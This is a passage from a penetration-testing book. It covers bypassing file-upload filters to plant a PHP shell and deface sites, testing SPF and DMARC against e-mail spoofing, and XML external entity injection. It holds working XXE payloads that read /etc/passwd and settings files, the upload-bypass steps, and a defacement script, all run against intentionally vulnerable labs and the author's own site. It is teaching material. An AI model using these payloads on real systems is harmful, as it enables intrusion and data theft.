Again, we will send the raw request to the Repeater tool (Figure 6-10). Clicking on the Repeater tab's "Go" button on the Request section will give us the response. We will see that response shortly, in Figure 6-12.



Figure 6-10. The Burp Suite Repeater tab

In the Response section, the shell-command.php code will only appear after you click the "Go" button in the "Request" section; it is shown along with the header text.

Now, let us watch the Request part of the left side of the Repeater tab closely (Figure 6-11). We will not only change the filename, but also we will add a .jpg extension with the filename, to trick the server. At the same time, we will have to change the content-type to image/jpg (Figure 6-11).



Figure 6-11. The Repeater tab output in Burp Suite

In Figure 6-11, we can see that after the line Content-Disposition in the Repeater tab, we have a line where we have changed the filename from shell-command.php to shell-command.php.jpg. It looks like this:

```
Content-Disposition: form-data , name="uploadedFile",
filename="shell-command.php.jpg"
Content-type: image/jpg
```

We are going to trick the server that it is an image with extension .jpg, which is allowed. At the same time, we have changed the Content-Type to image/jpg. Remember, you have to manually edit the Request section on the left-hand side, which we have done in Figure 6-11. After that we need to click the "Go" button again. In Figure 6-12, you can see the header part of the Request and Response section.



Figure 6-12. The Request and Response displayed in the Repeater tab

The figure was captured before we had clicked the "Go" button on the Request section. Clicking the "Go" button will inject the malicious file into the site.

That is all we need to deface the web application https://sanjib. site/upload.

Figure 6-12 clearly shows us that it is going to work when you click the "Go" button, because when you type https://sanjib.site/upload/ shell-command.php the file executes the shell commands and runs the ls -la command. Along with that, it has created the directory. However, due to the Burp Suite Repeater tab, the filename may change. It shows us a new file 8.php in our directory. This change may have happened for

several reasons because the system was live. I have made it intentionally vulnerable, and the hosting company's security infrastructure may have interfered.

Remember, as a penetration tester, you must not use any live system to show this type of owning the system attack that can deface any web site, except if you are the owner.

In the next step, I will show you a traditional defacement using the DVWA.



Figure 6-13. The output of the malicious PHP shell code on a live application https://sanjib.site/upload

Figure 6-13 clearly shows us the directory listing of that folder, and at the same time it has also created a folder called "hacker" inside it. It is evident that when I own a system, doing the directory listing and creating a directory, it is not difficult to deface with a slogan as is usual in traditional defacement!

Traditional Defacement

Since I cannot deface my web site, I can try it in the virtual lab. Let us do that with an intentionally vulnerable application in our virtual lab.

Let us open the DVWA application, click the "upload file" section, and upload a PHP file named x.php (Figure 6-14).



Figure 6-14. Upload is sucessful in DVWA.

The code of x.php is quite simple.

//code 6.7

<?php

echo "<h1>This site is hacked!</h1>";

As we go through the source code of DVWA, we find that the form has not been sanitized properly.

//code 6.8

```
<div class="vulnerable_code_area">
```

</div>

It means we can upload any file and run it to deface the home page of that particular directory (Figure 6-15).



Figure 6-15. Defacing the DVWA application

As a penetration tester, when you test your client's live system, you will try to upload any dynamic code. If the sanitization and validation part is not covered properly, you could upload any executable code using Burp Suite, as we have seen in the preceding examples.

Defacement is possible if the site is vulnerable to file upload. Being able to upload malicious files means you can deface any site with a flashy banner like this: "This site is hacked!" However, the fundamental attack that owns a system and allows the attacker to upload malicious file could be more dangerous.

CHAPTER 7

Poisoning Sender Policy Framework

Sender Policy Framework (SPF) is a technical standard that helps protect e-mail senders and recipients from spam, spoofing, and phishing. It's a form of e-mail authentication.

Consider an imaginary situation. My web site address is https:// sanjibsinha.fun. Now, I use a few e-mail addresses for various purposes. I send e-mails from these addresses and get replies to those addresses. One of them is support@sanjibsinha.fun. If my SPF is not correct, that is to say, if I don't maintain the regulated technical standard for that purpose, then any bad guy can send e-mails using that e-mail address support@ sanjibsinha.fun of mine. How that can be done, and how we should protect against it, we will see in this chapter. In other words, if I do not have sufficient SPF records, anybody can poison my web application's SPF using those vulnerabilities.

Therefore, SPF can be defined as a way to validate that an e-mail message is sent from an authorized mail server. In order to detect forgery and to detect spam, it is mandatory for every web application. The basic protocol to send an e-mail is SMTP. By default, SMTP does not include any authentication mechanism. For that reason, SPF is designed to supplement SMTP.

CHAPTER 7 POISONING SENDER POLICY FRAMEWORK

On finding that in the Request for Comments the Internet Engineering Task Force (IETF) had written a detailed report on the same issue, we should be very careful about it. You can keep yourself updated at this link: https://tools.ietf.org/html/rfc7208.

Testing SPF Records

As regards SPF, it is also a representation of a Domain Name Service (DNS) record. It specifically identifies which mail servers are permitted to send e-mail on behalf of your domain, using IP addresses. In any case, the SPF record is included in an organization's DNS database as a specially formatted DNS text record. There are simple steps that can help you write the SPF entries for your clients.

The first step to implement SPF is to identify which mail servers you want to use to send e-mail from your domain. Next, make a list of your sending domains. After that you can create your SPF record. The process is fairly simple.

Start with a v=spf1 (version 1) tag and follow it with the IP addresses. The DNS text record of https://sanjibsinha.fun looks like this:

v=spf1 +a +mx +ip4:94.130.19.124 ~all

Since the SPF record is published in DNS as a text record, the hosting provider can validate it.

Now we can try to send an e-mail to support@sanjibsinha.fun using any fake mailer like Emkei.cz or sendanonymousemail.net (Figure 7-1).

CHAPTER 7 POISONING SENDER POLICY FRAMEWORK



Figure 7-1. Trying to send fake mail using a fake mailer as support@ sanjibsinha.fun

With reference to Figure 7-1, we can say that this mission is not successful, because the SPF record of https://sanjibsinha.fun has been set in accordance with the technical standard. Although the anonymous sender's mail web page will display a message like "Thank you, your message has been sent," it stays undelivered if your SPF record maintains the technical standard.

Therefore, we can conclude that there are sufficient SPF records in my web site https://sanjibsinha.fun. However, we need to check whether there are any other vulnerabilities in that SPF record or not. In the next section we will discuss that.

Examining the Vulnerabilities of SPF

Although SPF is the technical standard for the authentication of your mail server, is it enough to protect your e-mails from spoofing or phishing? Are there any vulnerabilities that can be exploited? Yes, there are some limitations that you need to be aware of.

Certainly, SPF does not validate the From header; all the same this header is shown in most clients as the actual sender of the message. Instead of validating the From header, it uses the envelope from to determine the sending domain.

The envelope from is the return address. It actually tells mail servers where to return, or bounce, the message back to. The envelope from is contained in the hidden e-mail message header that includes technical details. The servers use those details to understand who is to get the e-mail, what software has been used, and many more technical details.

Therefore, SPF may break when an e-mail is forwarded. As each forwarder becomes the new sender of the message, at this point, the SPF checks performed by the new destination may fail the technical standard.

In this scenario, domain-based message authentication reporting and conformance (DMARC) plays a vital role. It is an e-mail validation system designed to protect any web application's e-mail domain from being used for e-mail spoofing or phishing.

Since SPF lacks reporting, DMARC adds that major function to SPF. In their DNS records, the domain owner publishes a DMARC record that will help them gain insight into who is sending e-mail on behalf of their domain.

Your clients will always want to ensure one thing: their customers will get e-mails that only they have sent—not any bad guy who will use a fake mailer and send e-mails anonymously.

According to a report by DMARC Analyzer, until 2016 there were lots of spear phishing attacks all over the world.

You can visit https://www.dmarcanalyzer.com for more information; you can also search about "phishing attacks." Overall, this type of attack is aggressively rampant.

Now, if web site or domain owners had been more conscious, following technical standards, it would have curtailed the crime a little bit.

The list from the report is quite long. We can check a few of them:

- 70% of all global e-mails are malicious.
- The volume of spam e-mails increased 4× in 2016.
- 9 out of 10 phishing e-mails has some form of ransomware in March 2016.
- 78% of people claim to be aware of the risks of unknown links in e-mails. And yet they click anyway.
- In the year 2016, more than 400,000 phishing sites have been observed each month on average.
- 30% of phishing e-mails get opened.

Of course, as a security professional or a pen tester, to stop it, you need to examine your client's domain and verify that they have an SPF record. To do that, you can validate it through two web sites:

```
http://www.kitterman.com/spf/validate.html
https://mxtoolbox.com
```

Let us go to http://www.kitterman.com/spf/validate.html.

We are going to test whether https://sanjibsinha.fun has a proper SPF record or not (Figure 7-2).

CHAPTER 7 POISONING SENDER POLICY FRAMEWORK

| +) → ୯ ພ | 🛈 🔒 https://www.kitterman.com/spf/validate.html | P |
|---|---|---|
| | SPF Record Testing Tools | |
| | | |
| Overview | | |
| processing limit errors (no oth
Live of the DNS record. Fo
information on how these too
Does my domain already
Retrieves SPF records for the | er testers I'm aware of do this). This site uses a caching DNS resolver, so for t
most basic uses, these tests should be reasonably self explanatory. Adva
Is work. It can be found here.
y have an SPF record? What is it? Is it valid?
especified domain name and determines if the record is valid. | ests that use live I
nced users may r |
| Domain nai | ne: sanjibsinha.fun | |
| Get SPF Record (if any | Reset Form | |
| NOTE: The domain is everyll
Is this SPF record valid
Tests the supplied SPF record
test is for checking the syntau
It will also be used for the % | hing to the right of the '@' in the e-mail address.
• syntactically correct?
In to see if it is valid. This test does NOT look up the record for the supplied
of records before you publish them. The domain is used only for mechanism
I macro if present. | domain. It only te
s such as a bare 'a |
| Domain: | | |
| SPF Record: | | |
| Check SPF record | Reset Form | |

Figure 7-2. Examining SPF record in http://www.kitterman.com/ spf/validate.html

We get this report from http://www.kitterman.com/spf/validate.html.

//code 7.1

SPF record lookup and validation for: sanjibsinha.fun SPF records are published in DNS as TXT records.

The TXT records found for your domain are: v=spf1 +a +mx +ip4:94.130.19.124 ~all

```
Checking to see if there is a valid SPF record.
```

```
Found v=spf1 record for sanjibsinha.fun:
v=spf1 +a +mx +ip4:94.130.19.124 ~all
evaluating...
SPF record passed validation test with pySPF (Python SPF library)!
Use the back button on your browser to return to the SPF
checking tool without clearing the form.
```

Now, at the same time we will also have a look at https://mxtoolbox.com (Figure 7-3).

| M 💽 | TOOLBC | X°_ | | upgrade | Delivery Center | Supertool | Monitorini |
|---|--|---|--|---|--|-----------|---------------|
| | | | | | | | terror at law |
| ۲ ' | АХ LOOKUP | Blacklists D | Diagnostics Do | omain Health Analyze Headers | Free Monitoring | DMARC | Investige |
| uperT | OO Beta7 | | | | | | |
| sanjibsir | nha.fun | | SPF | Record Lookup + | | | |
| | | | - Area | | | | |
| | | | | | | | |
| | | | | | | | |
| spf:sar | njibsinha. | fun Find Proble | ems Solve Em | ail Delivery Problems | | | C sp |
| spf:sai | njibsinha. | fun Find Proble | ems Solve Em | ail Delivery Problems | | | C sp |
| spf:sa | njibsinha. | fun Find Proble | ems Solve Em | ail Delivery Problems | | | ₿ sp |
| spf:sai | n jibsinha.
1 +a +mx + | fun Find Proble | ems Solve Em
4 ~all | ail Delivery Problems | | | C sp |
| s pf:sa
v=spf | n jibsinha.
1 +a +mx + | fun Find Proble | ems Solve Em | ail Delivery Problems | | | O sp |
| v=spf
Prefix | njibsinha.
1 +a +ax +
Type | fun Find Proble | ems Solve Em
4 ~all
PrefixDesc | all Delivery Problems | | | C sp |
| v=spf:
Prefix
v | njibsinha.
1 +a +mx +
Type
version | fun Find Proble | Solve Em
4 ~all
PrefixDesc | all Delivery Problems Description The SPF record version | | | C sp |
| v=spf:sai
v=spf
Prefix
v | njibsinha.
1 +a +ax +
Type
version
a | fun Find Proble | 4 ~all PrefixDesc Pass | all Delivery Problems Description The SPF record version Match if IP has a DNS 'A' record in giv | en domain | | C sp |
| v=spf:sal
v=spf
Prefix
v
+
+ | 1 +a +mx +
Type
version
a
mx | fun Find Proble | A ~all PrefixDesc Pass Pass | Description The SPF record version Match if IP has a DNS 'A' record in giv Match if IP is one of the MX hosts for | en domain
given domain name | | C sp |
| v=spf:sau
v=spf:
Prefix
v
+
+
+ | 1 +a +mx +
Type
version
a
mx
ip4 | fun Find Proble | Solve Em
4 ~all
PrefixDesc
Pass
Pass
Pass | Description The SPF record version Match if IP has a DNS 'A' record in giv Match if IP is one of the MX hosts for Match if IP is in the given range | en domain
given domain name | | C sp |
| v=spf:
v=spf:
Prefix
+
+
+ | njibsinha.
1 +a +mx +
Type
version
a
mx
ip4
all | Find Proble 1p4: 94.130.19.124 Value spf1 94.130.19.124 | A ~all PrefixDesc Pass Pass Pass SoftFail | Description The SPF record version Match if IP has a DNS 'A' record in giv Match if IP is one of the MX hosts for Match if IP is in the given range Always matches. It goes at the end of | en domain
given domain name
your record. | | C sp |

Figure 7-3. Examining the SPF record in https://mstoolbox.com

We have found that https://sanjibsinha.fun has a proper SPF record, and it looks like this:

```
//code 7.2
v=spf1 +a +mx +ip4:94.130.19.124 ~all
```

CHAPTER 7 POISONING SENDER POLICY FRAMEWORK

However, if you examine further, you will find that there are some problems in some areas, such as DMARC records (Figure 7-4).

| | - 1 | Problems | () Blacklist | Mail Server | Web Server | Z DNS | |
|---|-----------|-----------------|--|-------------------------------------|------------|-------------|-----------|
| | - 1 | C 3 Errors | 1 Errors | C 2 Errors | O Errors | O Errors | |
| | | 0 5 Warring | O Warning | 4 Warning | O Warning | 1 Warning | |
| | | 46 Passed | Ø 7 Passed | 15 Passed | Ø 8 Passed | O 16 Passed | |
| 0 | dmarc | sanjibsinha.fun | DNS Record not found | | | | O More In |
| | Category | Host | Result | | | | |
| - | Carmarc. | augeannicht | UNS Record not round | | | | 0.000 |
| 8 | blacklist | sanjibsinha.fun | Blacklisted by SEM FRESH | | | | More Inf |
| 0 | mx | sanjibsinha.fun | No DMARC Record found | | | More Inf | |
| 0 | mx | sanjibsinha.fun | DMARC Quarantine/Reject policy not enabled | | | | More Inf |
| 0 | dns | sanjibsinha.fun | | Name Servers are on the Same Subnet | | | |
| 0 | smtp | sanjibsinha.fun | Reverse DN | IS does not match SMTP Banner | | | More Inf |
| | versee. | excitations for | Warning - Does not support TLS. | | | | More Inf |
| 0 | smtp | sarposteración | | | | | • |

Figure 7-4. The problem areas in DAMRC zone in https://sanjibsinha.fun

https://mxtoolbox.com has not found any DMARC record. At the same time, it has not found any DNS record in the DMARC zone. You should include these images in your report when you write it.

You can write to your client that a web site owner should know for sure that all their visitors or customers will only see e-mails that they have sent. Therefore, the DMARC record is a must for every domain owner. Securing e-mail with DMARC is important, because e-mail recipients are convinced that an e-mail seemingly originating from your web sites is legitimate.

Finally, I would like to add a few lines for the readers who are acquainted with Linux commands. There are some command line tools that you can use to show SPF records, or current SPF records can be verified by running compare.sh. You can download the SPF command tools from https://github.com/spf-tools/spf-tools.

CHAPTER 8

Injecting Unintended XML

Whenever we pen test an application and we see that the application functionality has XML parsing in the backend, we try to pen test the app with XML injection issues. Usually we use an XML parser to check whether the client application's XML document is properly formatted or not. We also validate the XML documents with that XML parser. Before penetration testing any application with XML injection issues, using XML parsers is a normal procedure. This type of XML injection can cause medium to severe kind of damages to the application. It can alter the intended logic of the application. That is the reason why we call it unintended XML injection.

As a pen tester, when you examine a web application, you put it to the test to insert XML metacharacters to modify the structure of the resulting XML.

Furthermore, depending on the code you are using, it is possible to interfere with the application's logic, performing unauthorized actions or accessing sensitive data. Moreover, you should review the application's response to determine whether it is indeed vulnerable.

In the virtual lab, we are going to do the same shortly. Before that, we need to understand a few important concepts, such as what is XML? Why do we need it, and what is a DTD? We will also have an idea about how the keywords and entity play a vital role in any XML injection attack.

The coming sections describe practical examples of XML injection. Before that, we need to know what XML is.

What Is XML?

First of all, XML is a software- and hardware-independent language for storing and transporting data. Second, XML stands for extensible markup language and is similar to HTML. Third, XML was designed to be self-descriptive. So you can design the structure according to your necessity. Finally, you need to define both the tags and the document structure in a way that is meaningful, as you would design a database table and fields, because you will find that XML is similar to a database.

The next big question is why we need XML. Instead of using a database, why should we use an XML document? The biggest advantage of XML is that it's software and hardware independent. An XML document stores data in a plain text that makes things much easier, therefore it simplifies the process of storing and transporting data.

Let us see an example of XML data:

```
//code 8.1
<email>
    <to>Bob</to>
    <from>John</from>
    <message>Hello, Bob.</message>
</email>
```

Here <email> is an element. Inside the <email> element, we have more elements, such as <to>, <from>, and <message>. You can add as many elements as you wish.

It is similar to a table in a database where you create a table called email. Inside the email table you have fields called to and so on. Of course, you can write the same file in JSON, like this:

```
{
    "to": "Bob",
    "from": "John",
    "message": "Hello, Bob"
}
```

As a data transporter and storage facility, JSON is quickly overtaking XML in popularity. However, still in many web applications you will find the usage of XML because it has been popular for many years.

What Is a DTD?

A document type definition or DTD defines the legal elements and attributes of an XML document. With a DTD, developers agree on a standard data structure for storing and transporting data.

Furthermore, an application can verify with the help of DTD that an XML document is properly formatted or not. It will also check whether the XML data is defined internally within an XML document or from an external source like a URI or URL. DTDs allow us to define what will be the keywords and entities in an XML document. Thus, the XML vulnerabilities test can be done by injecting new keywords and entities.

We can declare a DTD inside that e-mail XML from before like this:

```
<?xml version="1.0"?>
<!DOCTYPE email [
<!ELEMENT email (to,from,message)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
```

```
CHAPTER 8 INJECTING UNINTENDED XML
<!ELEMENT message (#PCDATA)>
]>
<email>
<to>Bob</to>
<from>John</from>
<message>Hello, Bob.</message>
</email>
```

Now, if you parse this XML file and see the view source, you will find that the second and the third line

```
<!DOCTYPE email [
<!ELEMENT email (to,from,message)>
```

will be commented out and only the version and the element portions remain. Obviously, this is called an internal DTD.

What Is XML External Entity Injection?

XML injection is often similar to XXE injection. XXE stands for XML external entity. XXE allows an attacker to interact with an application's processing of XML data. Through XXE injection we can view the server file system; we can interfere in any back-end processing; furthermore, we can attack any external systems that the application itself can access. In many cases, applications use the XML format to transmit data between the browser and the server. While doing this, it uses a standard library or platform API to process the XML data on the server. The application owner has no control over those standard libraries or platform API, where potentially dangerous features may lie hidden. Although DTD plays a vital role in defining the XML formatting, it has no control over the XML external entities, because they are types of custom XML entities that are loaded from outside of the DTD definition. As a pen tester, you will find external entities very interesting, because you can define an entity of the XML data based on the contents of a file path or URL.

Let us see an example of such external entities. In an intended vulnerable application in our virtual lab, we can validate code to retrieve all the passwords of a system. We will see that in the coming sections. We are also going to perform different types of XML injections in our virtual lab.

Performing XML Injection in a Virtual Lab

Let us start the owaspbwa application in our virtual lab and open the mutillidae intentionally vulnerable web application. In the validation field we will insert this code:

//code 8.2

```
<?xml version="1.0"?>
  <!DOCTYPE change-log [
        <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]><text>&xxe;</text>
```

It will give us an output like this:

```
//code 8.3
//XML Submitted
<?xml version="1.0"?>
<!DOCTYPE change-log [ <!ENTITY xxe SYSTEM "file:///etc/
passwd"> ]>
<text>&xxe;</text>
```

//Text Content Parsed From XML

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/ sbin:/bin/sh bin:x:2:2:bin:/bin/sh sys:x:3:3:sys:/dev:/ bin/sh sync:x:4:65534:sync:/bin/sync games:x:5:60:games:/ usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/ sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/ var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/ bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/ nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/ sh syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/ home/klog:/bin/false mysql:x:103:105:MySQL Server,,,:/ var/lib/mysql:/bin/false landscape:x:104:122::/var/lib/ landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/ sbin/nologin postgres:x:106:109:PostgreSQL administrator,,,:/ var/lib/postgresql:/bin/bash messagebus:x:107:114::/var/run/ dbus:/bin/false tomcat6:x:108:115::/usr/share/tomcat6:/bin/ false user:x:1000:1000:user,,,:/home/user:/bin/bash polkit user:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false haldaemon:x:110:119:Hardware abstraction layer,,,:/var/run/ hald:/bin/false pulse:x:111:120:PulseAudio daemon,,,:/var/run/ pulse:/bin/false postfix:x:112:123::/var/spool/postfix:/bin/ false

As you see, we have easily injected XML external entities into the intentionally vulnerable application mutillidae.

This part of code 8.3 is especially important.

```
<!DOCTYPE change-log [ <!ENTITY xxe SYSTEM "file:///etc/
passwd"> ]>
<text>&xxe;</text>
```

Here we have used the external entity name xxe and we have also used the SYSTEM keyword. In the second line, where we were supposed to define the value of the XML data, we have used the entity name &xxe;. In Figure 8-1, we see the same output.

Here we have used &xxe as a custom XML entity whose defined values are loaded from outside of the DTD. Now the mutillidae application has used the XML format to transmit data between the browser and the server. As a penetration tester you may encounter such applications where the XML specification contains various potentially dangerous features like this. The standard parsers support these features even if they are not normally used by the application.



Figure 8-1. In the "mutillidae" application, we have retrieved all the passwords of a system.

Now we can examine another intentionally vulnerable application, bWAPP, using the Burp Suite. Open the bWAPP and select the XXE attack section (Figure 8-2). To start with, you should register as a user in the bWAPP Missing Function application so that, using the Burp Suite Repeater tool, you can inject the external entities just as you have done in the mutillidae application. In Burp Suite, keep the Intercept in off mode and open bWAPP. Next, turn the Burp Suite Intercept tool to "on" and in your bWAPP application click the "Any bugs?" button.



Figure 8-2. Testing XML external entities attack using bWAPP and Burp Suite

In your Burp Suite, you will get an output similar to this (Figure 8-3):

```
POST /bWAPP/xxe-2.php HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: */*
```

//code 8.4

```
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/bWAPP/xxe-1.php
Content-type: text/xml; charset=UTF-8
Content-Length: 61
Cookie: security_level=2; PHPSESSID=fjilqqjim5kuqn7t7v
7khqgue4; acopendivids=swingset,jotto,phpbb2,redmine;
acgroupswithpersist=nada
Connection: close
<reset><login>Lokhu</login><secret>Any bugs?</secret></reset>
```

In the last line it catches the login detail where I have used the user name "Lokhu." You can use any name.



Figure 8-3. The output in the Burp Suite when Interpret is on

Next, click your second mouse button on the Burp Suite interface and send the raw request to the Repeater tool (Figure 8-4).



Figure 8-4. Sending the bWAPP application data output to the Repeater tool

Now, click on the Go button. It will send the request to the bWAPP application and, finally, you have an output like this (Figure 8-5).



Figure 8-5. The response in the Repeater tool

Next, we can try some XML injection into code 8.4 we have written before. We can change code 8.4 to this, changing the last part where we want to inject an XML entity:

//code 8.5

POST /bWAPP/xxe-2.php HTTP/1.1 Host: 192.168.2.3 User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.2.3/bWAPP/xxe-1.php Content-type: text/xml; charset=UTF-8 Content-Length: 61 Cookie: security level=2; PHPSESSID=fjilqqjim5kuqn7t7v 7khqgue4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada Connection: close <?xml version="1.0" encoding="utf-8"?><!DOCTYPE Header [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

Or if you want to get the detail of the entire file system settings, you can use the following code:

//code 8.6

<?xml version="1.0"?> <!DOCTYPE change-log [<!ENTITY xxe
SYSTEM "php://filter/convert.base64-encode/resource=opt/lamp/
htdocs/admin/settings.php">]><text>&xxe;</text>

As you see, we have used the same entity xxe and the SYSTEM keyword has been used along with it for one reason: we wanted to retrieve data from the server system.

We will get the same output as we got in code 8.2. Since bWAPP is an XML injectable application, the XML injection has been successfully loaded from outside.

In the next section we will see how to fetch system configuration files using Burp Suite and the intentionally vulnerable application mutillidae.

Fetching System Configuration Files

To test whether the web application has XML injection vulnerabilities, we need Burp Suite and the OWASP intentionally vulnerable application mutillidae. Keeping the Burp Intercept in off mode, we need to open the mutillidae first. Then, we turn on the Intercept tool of Burp Suite.

In the Validate field of mutillidae, enter the value idnf; since we have kept our Intercept on, we have gotten the results as shown in Figure 8-6. The application mutillidae has keywords for searching the system configuration files. The word idnf is one of the keywords. If you go through mutillidae documentation, you will find them. It is available on the top of the page; click the "Hints" button and you will view many tips. This keyword will identify the particular XML we are going to inject through the Burp Suite Intruder tool.



Figure 8-6. The output in the Burp Suite, keeping the Interpret tool on

The output can be seen in code 8.7:

//code 8.7

```
GET /mutillidae/index.php?page=xml-validator.php&xml=idnf&xml-
validator-php-submit-button=Validate+XML HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/mutillidae/index.php?page=xml-
validator.php&xml=%3Csomexml%3E%3Cmessage%3EHello+World%3
C%2Fmessage%3E%3C%2Fsomexml%3E+&xml-validator-php-submit-
button=Validate+XML
Cookie: showhints=1; PHPSESSID=gaobudj106cmtfdOuepm
ei7la6; acopendivids=swingset,jotto,phpbb2,redmine;
acgroupswithpersist=nada
```
CHAPTER 8 INJECTING UNINTENDED XML DNT: 1 Connection: close Upgrade-Insecure-Requests: 1

The output (code 8.7) is quite straightforward. Mutillidae sends the request using the GET method. Instead of the POST method, it has used GET because this application is intentionally vulnerable.

Now we will send this output to the Intruder tool in Burp Suite. Click the second mouse button, and send it to the Intruder tool. Once the Intruder tool gets this output, it changes the output to get the payload position (Figure 8-7).



Figure 8-7. The output in the Intruder tool of Burp Suite

And we get the output similar to this:

//code 8.8

```
//using Intruder tool of Burp Suite
GET /mutillidae/index.php?page=§xml-validator.php§&xml=§idnf§
&xml-validator-php-submit-button=§Validate+XML§ HTTP/1.1
Host: 192.168.2.3
```

```
User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:60.0) Gecko/
20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/mutillidae/index.php?page=xml-
validator.php&xml=%3Csomexml%3E%3Cmessage%3EHello+World%3
C%2Fmessage%3E%3C%2Fsomexml%3E+&xml-validator-php-submit-
button=Validate+XML
Cookie: showhints=§1§; PHPSESSID=§qaobudj106cmtfdOuepm
ei7la6§; acopendivids=§swingset,jotto,phpbb2,redmine§;
acgroupswithpersist=§nada§
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Watch the first line:
GET /mutillidae/index.php?page=§xml-validator.
php§&xml=§idnf§&xml-validator-php-submit-button=§Validate+
XML§ HTTP/1.1
```

The Intruder has added some extra special characters to the GET request. Those are predefined lists of useful payloads. It has an internal mechanism of custom permutation to generate such characters.

We need to clear it first. On the right-hand side of the Intruder tool we will find four buttons: Add, Clear, Auto, and Refresh. We need to click the Clear button and after that select only the word idnf.

Therefore, the output changes to this:

//code 8.9

```
GET /mutillidae/index.php?page=xml-validator.php&xml=§idnf§&
xml-validator-php-submit-button=Validate+XML HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/mutillidae/index.php?page=xml-
validator.php&xml=%3Csomexml%3E%3Cmessage%3EHello+World%3
C%2Fmessage%3E%3C%2Fsomexml%3E+&xml-validator-php-submit-
button=Validate+XML
Cookie: showhints=1; PHPSESSID=gaobudj106cmtfdOuepmei7la6; acope
ndivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

Next we are going to use the payload sets of the Intruder tool. We need to load our XML file full of many external entities that will be used for XXE injection. In the Intruder tool, click on Payloads. It will open a window to load your XML file (Figure 8-8).

| | | | | | | | | | | | | | | | | | | | _ |
|---|---|---|-------------------|----------------|----------------|------------|---------------|-------------------|-----------------|-------------|-----------------|--------------|--------------|--------------|--------------|--------------|-------|-------|---|
| | | | | | B | arp Suite | Commu | nity Edition | 1.7.36 - Ter | mporary | Project | | | | | | 0 | | Ð |
| Intruder Repa | ater Window Help | | - T | | | | | | T | 1 | | | | | | | | _ | - |
| et Proxy 1 | poer scerver | I weruder [| nepexer | 2 e Grance. | Decoder C | onparer | Extender | Project options | User options | a Averta | ASSYMMETOR | _ | | | | | | - | |
| at Postions | Paulande Oct | | | | | | | | | | | | | | | | | | |
| a Postors | Payeaus Ope | | | | | | | | | | | | | | | | | - | |
| Payload S | ets | | | | | | | | | | | | | | | | Start | attac | k |
| You can define | one or more paylo | ad sets. The | number of pa | iyload sets de | pends on the a | etack type | defined in th | ve Positions tab. | various payload | types are a | valable for eac | ch payload : | set, and ear | h payload ty | pe can be cu | stornized in | - | | |
| different ways. | | | | | | | | | | | | | | | | | | | |
| Payload set | 1 | | Payload co | ount: 0 | | | | | | | | | | | | | | | |
| Pauload tune | Simple int | | fam.ext c | wet 0 | | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | | | | |
| Dauland O | otions (Simpl | le lietl | | | | | | | | | | | | | | | | | |
| Payload O | ptions (Simpl | le list] | | | | | | | | | | | | | | | | | |
| Payload O | ptions (Simpl
pelets you configu | le list]
re a simple in | ist of strings th | nat are used a | n payloads | | | | | | | | | | | | | | |
| Payload O
This payload by | ptions (Simp)
pelets you configu | le list)
re a single li | ist of strings th | nat are used a | n payloads. | | | | | | | | | | | | | | |
| Payload O
This payload ty
Paste | ptions (Simp)
pelets you configu | <mark>le list]</mark>
re a simple le | ist of strings th | hat are used a | n payloads | | | | | | | | | | | | | | |
| Payload O
This payload by
Paste
Load | ptions (Simpl
pelets you configu | le list]
re a simple is | at of strings th | hat are used a | n payloads. | | | | | | | | | | | | | | |
| Payload O
This payload ty
Paste
Load
Remove | ptions (Simpl
pelets you configu | le list]
re a single i | at of strings th | t bezu ere Ste | n payloads. | | | | | | | | | | | | | | |
| Payload O
This payload ty
Paste
Load
Remove | ptions (Simpl
pelets you configu | le list]
re a simple i | at of strings th | hat are used a | n payloads. | | | | | | | | | | | | | | |
| Payload O
This payload ty
Paste
Load
Remove
Clear | ptions (Simp)
peliets you configu | le list]
re a simple is | at of strings th | hat are used a | es payloads. | | | | | | | | | | | | | | |
| Payload O
This payload ty
Paste
Load
Remove
Clear | ptions (Simpl
pelets you configu | le list]
